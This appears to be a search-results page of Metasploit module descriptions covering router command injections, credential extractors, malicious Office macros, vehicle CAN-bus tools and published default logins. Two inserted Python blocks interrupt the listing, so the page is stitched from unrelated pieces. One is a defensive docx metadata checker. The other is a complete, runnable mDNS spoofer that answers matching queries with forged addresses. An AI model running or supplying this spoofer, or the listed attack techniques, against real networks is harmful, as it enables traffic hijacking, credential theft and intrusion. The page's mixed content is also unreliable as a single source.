6845 matches found
SMS Client
This module sends a text message to multiple phones on the same carrier. It can be used to deliver a malicious link to phones. Note that this module cannot send a media file attachment; to send a media file, use auxiliary/client/mms/sendmms instead. This module...
Cambium ePMP 1000 'ping' Password Hash Extractor (up to v2.5)
This module exploits an OS command injection vulnerability in the 'ping' function of Cambium ePMP 1000 devices (up to v2.5) to extract password hashes. Author: Karn Ganeshen. This module requires Metasploit: https://metasploit.com/download. Current source: https://github.com/rapid7/metasploit-framework
Logsign Remote Command Injection
This module exploits a command injection vulnerability in Logsign. By exploiting this vulnerability, unauthenticated users can execute arbitrary code as the root user. Logsign has a publicly accessible endpoint that takes user input and then uses it in an operating system command...
Debian/Ubuntu ntfs-3g Local Privilege Escalation
The ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe. This can be abused to load a kernel module and execute a binary payload as the root user.
QNAP NAS/NVR Administrator Hash Disclosure
This module exploits combined heap and stack buffer overflows in QNAP NAS and NVR devices to dump the admin (root) shadow hash from memory via an overwrite of libc's argv[0] in the HTTP-header-bound glibc backtrace. A binary search is performed to find the correct offset for the overflows. Since the server...
Gather Tomcat Credentials
This module will attempt to collect credentials from Tomcat services running on the machine.
Jboss Credential Collector
This module can be used to extract the JBoss admin passwords for versions 4, 5 and 6.
Architecture Migrate
This module checks whether the Meterpreter architecture matches the OS architecture; if it does not, it spawns a new process with the correct architecture and migrates into that process.
NTDS Grabber
This module uses a PowerShell script to obtain a copy of the ntds.dit, SAM and SYSTEM files on a domain controller. It compresses all of these files into a cabinet file called All.cab.
Windows Gather DynaZIP Saved Password Extraction
This module extracts clear-text credentials from dynazip.log. The log file contains passwords used to encrypt compressed zip files in Microsoft Plus! 98 and Windows Me.
MVPower DVR Shell Unauthenticated Command Execution
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands supplied in the query string. This module was tested successfully on an MVPower model TV-7104HE with firmware...
Kodi 17.0 Local File Inclusion Vulnerability
This module exploits a directory traversal flaw found in Kodi before 17.1.
Microsoft Office Word Malicious Macro Execution
This module injects a malicious macro into a Microsoft Office Word document (docx). The Comments field in the document metadata is injected with a Base64-encoded payload, which the macro decodes and executes as a Windows executable. For a successful attack, the victim is required to manually enabl...
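A defender's counterpart to the technique just described, added here as an example and not part of the module or the original page: inspect a Word document for the combination the description names, a VBA project plus a large Base64 run in the Comments metadata field. It assumes that Word stores the Comments property as dc:description inside docProps/core.xml and that macros live in word/vbaProject.bin; the two fixtures are constructed in memory (a fake MZ-headed blob stands in for the payload) and are not real documents.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_DC = "http://purl.org/dc/elements/1.1/"          # dc:description = Word "Comments" field (assumption)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")   # an opaque Base64 run of at least 64 chars


def inspect_docx(data: bytes) -> dict:
    """Return indicators for a docx/docm blob: macro presence, Comments length, Base64 blob size, decoded magic."""
    result = {"has_vba": False, "comments_len": 0, "b64_blob_len": 0, "decoded_magic": None}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        result["has_vba"] = "word/vbaProject.bin" in names
        if "docProps/core.xml" in names:
            root = ET.fromstring(zf.read("docProps/core.xml"))
            desc = root.findtext(f"{{{NS_DC}}}description") or ""
            result["comments_len"] = len(desc)
            m = B64_RUN.search(desc.replace("\n", ""))
            if m:
                result["b64_blob_len"] = len(m.group(0))
                try:
                    # Peek at the first bytes: "MZ" means a PE executable was stashed in the metadata.
                    result["decoded_magic"] = base64.b64decode(m.group(0), validate=True)[:2]
                except ValueError:
                    pass
    return result


def is_suspicious(indicators: dict) -> bool:
    """Macro present AND a large opaque blob in the Comments field is the pattern worth alerting on."""
    return indicators["has_vba"] and indicators["b64_blob_len"] >= 64


def make_sample_docx(comments: str, with_vba: bool) -> bytes:
    """Construct a minimal docx-shaped zip as a test fixture (not a real Word file)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
        f'xmlns:dc="{NS_DC}"><dc:title>Invoice</dc:title>'
        f'<dc:description>{comments}</dc:description></cp:coreProperties>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            # OLE2 magic followed by filler: enough to look like a vbaProject.bin for this check.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


# Constructed fixtures: a fake "payload" (MZ header plus filler) Base64-encoded into the Comments field,
# and a benign document with an ordinary comment and no macro.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 200
MALICIOUS = make_sample_docx(base64.b64encode(FAKE_PAYLOAD).decode(), with_vba=True)
BENIGN = make_sample_docx("Reviewed by finance, Q3 figures", with_vba=False)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS), ("benign", BENIGN)):
        ind = inspect_docx(blob)
        print(label, ind, "SUSPICIOUS" if is_suspicious(ind) else "ok")
```

The check deliberately keys on the pairing rather than on either signal alone: long comments are common in real documents, and macros alone are a policy question, but a macro document whose metadata carries a Base64 run that decodes to an MZ header has no benign explanation.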
Netgear R7000 and R6400 cgi-bin Command Injection
This module exploits an arbitrary command injection vulnerability in Netgear R7000 and R6400 router firmware version 1.0.7.21.1.93 and possibly earlier.
Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE
This module exploits a stack buffer overflow in the GCore server, GCoreServer.exe. The vulnerable web server listens on ports 13003 and 13004, does not require authentication, and is affected in all versions from 2003 until July 2016 (version 1.4.YYYYY).
Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database
This module scans for Carlo Gavazzi Energy Meter login portals, performs a login brute-force attack, enumerates the device firmware version, and attempts to extract the SMTP configuration. A valid admin-privileged user is required to extract the SMTP password. In some older firmware versions, the SM...
Piwik Superuser Plugin Upload
This module will generate a plugin, pack the payload into it and upload it to a server running Piwik. Superuser credentials are required to run this module. This module does not work against Piwik 1, as there is no option to upload custom plugins. Piwik disabled custom plugin uploads in version...
Microsoft SQL Server Clr Stored Procedure Payload Execution
This module executes an arbitrary native payload on a Microsoft SQL Server by loading a custom SQL CLR assembly into the target SQL installation and calling it directly with a Base64-encoded payload. The module requires working credentials in order to connect directly to the MSSQL server. This...
Apache OpenOffice Text Document Malicious Macro Execution
This module generates an Apache OpenOffice text document with a malicious macro in it. To exploit successfully, the targeted user must have set the security level in Macro Security to either Medium or Low. If set to Medium, the user is prompted to enable or disable the macro. If set to...
Android Meterpreter Shell, Reverse HTTPS Inline
Connect back to the attacker and spawn a Meterpreter shell.
WordPress REST API Content Injection
This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API.
NETGEAR Administrator Password Disclosure
This module will collect the password for the admin user. The exploit will not complete if password recovery is enabled on the router. The password is obtained by passing the token generated by unauth.cgi to passwordrecovered.cgi. This exploit works on many different NETGEAR products. The full list...
Cambium ePMP 1000 Dump Device Config
This module dumps the Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four login accounts: admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials (admin / installer / home) to dump the device configuration...
Binom3 Web Management Login Scanner, Config and Password File Dump
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portals, and attempts to identify valid credentials. There are four default accounts: 'root'/'root', 'admin'/'1', 'alg'/'1' and 'user'/'1'. In addition to the device config, the 'root' user can...
AlienVault OSSIM/USM Remote Code Execution
This module chains object injection, authentication bypass and IP spoofing vulnerabilities. Unauthenticated users can execute arbitrary commands in the context of the root user. Abusing the authentication bypass on gauge.php allows an adversary to reach the object injection...
Cisco WebEx Chrome Extension RCE (CVE-2017-3823)
This module exploits a vulnerability present in the Cisco WebEx Chrome Extension version 1.0.1 which allows an attacker to execute arbitrary commands on a system.
mDNS Spoofer
This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address when the queried name matches the configured regex.
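As an added example (not the Metasploit module's code), the following Python shows the mechanics the description refers to: parse the question section of a multicast DNS query, match each queried name against a regex, and build an A or AAAA answer pointing at an address of the spoofer's choosing. The sample query packet is constructed inline, the live listener is only entered when the file is run as a script, and the decision to answer on the multicast group with a zero transaction ID and the cache-flush class bit (the unsolicited-response form from RFC 6762) is this example's, not necessarily the module's.

```python
import re
import socket
import struct

MDNS_GROUP = "224.0.0.251"
MDNS_PORT = 5353
TYPE_A, TYPE_AAAA = 1, 28


def parse_name(buf: bytes, off: int):
    """Decode a DNS name at buf[off]; returns (dotted name, offset after the name). Follows compression pointers."""
    labels, end, jumped = [], off, False
    while True:
        length = buf[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:                        # compression pointer: 2 bytes, then jump
            ptr = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        labels.append(buf[off:off + length].decode("ascii", "replace"))
        off += length
    if not jumped:
        end = off
    return ".".join(labels), end


def parse_queries(pkt: bytes):
    """Return [(name, qtype), ...] from the question section of a DNS/mDNS packet; [] for responses or junk."""
    if len(pkt) < 12:
        return []
    _txid, flags, qdcount, _an, _ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    if flags & 0x8000:                                   # QR=1: this is a response, not a query
        return []
    off, questions = 12, []
    for _ in range(qdcount):
        name, off = parse_name(pkt, off)
        qtype, _qclass = struct.unpack_from("!HH", pkt, off)
        off += 4
        questions.append((name, qtype))
    return questions


def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split(".")) + b"\x00"


def build_response(name: str, qtype: int, addr: str, ttl: int = 120) -> bytes:
    """One-answer mDNS response: txid 0, QR|AA flags, IN class with the cache-flush bit (0x8001) set."""
    family = socket.AF_INET if qtype == TYPE_A else socket.AF_INET6
    rdata = socket.inet_pton(family, addr)
    header = struct.pack("!HHHHHH", 0, 0x8400, 0, 1, 0, 0)
    rr = encode_name(name) + struct.pack("!HHIH", qtype, 0x8001, ttl, len(rdata)) + rdata
    return header + rr


def spoof_answers(pkt: bytes, pattern: str, ipv4: str, ipv6: str = None):
    """For every A/AAAA question whose name matches `pattern`, produce a spoofed response packet."""
    rx = re.compile(pattern)
    out = []
    for name, qtype in parse_queries(pkt):
        if not rx.search(name):
            continue
        if qtype == TYPE_A:
            out.append(build_response(name, TYPE_A, ipv4))
        elif qtype == TYPE_AAAA and ipv6:
            out.append(build_response(name, TYPE_AAAA, ipv6))
    return out


def serve(pattern: str, ipv4: str, ipv6: str = None):
    """Join the mDNS group on 5353/udp and answer matching queries (needs a network; not run on import)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", MDNS_PORT))
    mreq = struct.pack("4s4s", socket.inet_aton(MDNS_GROUP), socket.inet_aton("0.0.0.0"))
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        pkt, _src = sock.recvfrom(9000)
        for resp in spoof_answers(pkt, pattern, ipv4, ipv6):
            sock.sendto(resp, (MDNS_GROUP, MDNS_PORT))


# Constructed sample: a query for "printer.local", type A, class IN (not a captured packet).
SAMPLE_QUERY = (struct.pack("!HHHHHH", 0, 0, 1, 0, 0, 0)
                + encode_name("printer.local") + struct.pack("!HH", TYPE_A, 1))

if __name__ == "__main__":
    import sys
    # Example: python mdns_spoof.py '\.local$' 192.0.2.10  (192.0.2.10 is a documentation address)
    serve(sys.argv[1] if len(sys.argv) > 1 else r"\.local$",
          sys.argv[2] if len(sys.argv) > 2 else "192.0.2.10")
```

The same parser is what a detection would use in reverse: an mDNS response on the wire whose answer carries the cache-flush bit for a name the local host just asked about, from a source that is not the legitimate owner, is the footprint this kind of spoofer leaves.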
Advantech WebAccess 8.1 Post Authentication Credential Collector
This module allows you to log into Advantech WebAccess 8.1 and collect all of the stored credentials. Although authentication is required, a user with any permission level can exploit this vulnerability. Note that this does not work against version 8.2.
Advantech WebAccess Login
This module will attempt to authenticate to Advantech WebAccess.
Firefox nsSMILTimeContainer::NotifyTimeChange() RCE
This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange across numerous versions of Mozilla Firefox on Microsoft Windows.
DiskSavvy Enterprise GET Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP...
Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution
This module exploits a command injection vulnerability in the Trend Micro IMSVA product. An authenticated user can execute a terminal command in the context of the web server user, which is root. In addition, a default installation of IMSVA ships with default administrator credentials. saveCert.ims...
Cisco Firepower Management Console 6.0 Login
This module attempts to authenticate to a Cisco Firepower Management console via HTTPS. The credentials are also used for SSH, which could allow remote code execution.
TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection
TrueOnline is a major ISP in Thailand, and it distributes a customized version of the Billion 5200W-T router. This customized version has at least two command injection vulnerabilities, one authenticated and one unauthenticated, on different firmware versions. This module will attempt to exploit...
TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection
TrueOnline is a major ISP in Thailand, and it distributes a customized version of the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection vulnerability in the remote log forwarding page. This can be exploited using the "supervisor" account that comes with a...
TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection
TrueOnline is a major ISP in Thailand, and it distributes a customized version of the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command injection vulnerability in the remote log forwarding page. This module was tested in an emulated environment, as the author doesn'...
Jenkins CLI HTTP Java Deserialization Vulnerability
This module exploits an unsafe deserialization vulnerability in Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not required to exploit this vulnerability.
Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
This module exploits a directory traversal vulnerability in Cisco Firepower Management in the context of the www user. Authentication is required to exploit this vulnerability.
DiskBoss Enterprise GET Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on...
Sample Module to Flood Temp Gauge on 2006 Malibu
Simple sample temp flood for the 2006 Malibu.
Get the Vehicle Information Such as the VIN from the Target Module
Post module to query DTCs, common engine info and vehicle info. It returns engine speed, coolant temperature and Diagnostic Trouble Codes, as well as all information stored under Mode $09 (Vehicle Info: VIN, etc.).
Hardware Bridge Server
This module sets up a web server to bridge communications between Metasploit and physically attached hardware. Currently this module supports: automotive.
Hardware Bridge Session Connector
The Hardware Bridge (HWBridge) is a standardized method for Metasploit to interact with hardware devices. This extends the normal exploit capabilities to the non-Ethernet realm and enables direct hardware and alternative-bus manipulation. You must have compatible bridging hardware attached to this...
Scan CAN Bus for Diagnostic Modules
Post module to scan the CAN bus for any modules that respond to UDS DSC (Diagnostic Session Control) queries.
Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability
This module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability...
Meteocontrol WEBlog Password Extractor
This module exploits an authentication bypass vulnerability in Meteocontrol WEBlog appliance software version...
Cambium ePMP 1000 Login Scanner
This module scans for Cambium ePMP 1000 management login portals, and attempts to identify valid credentials. Default login credentials are admin/admin, installer/installer, home/home and readonly/readonly.
VMware VDP Known SSH Key
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known SSH private key for the local user 'admin', who can sudo without a password.
PHPMailer Sendmail Argument Injection
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which an attacker can leverage to write a file with partially controlled contents to an arbitrary location, by injecting arguments that are passed to the sendmail binary. This module writes a payload to th...
NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Buffer Overflow
The NETGEAR WNR2000 router has a stack buffer overflow vulnerability in the hidden_lang_avi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp held in the router's configuration. An authenticated attacker can simply fetch this from a page, but an...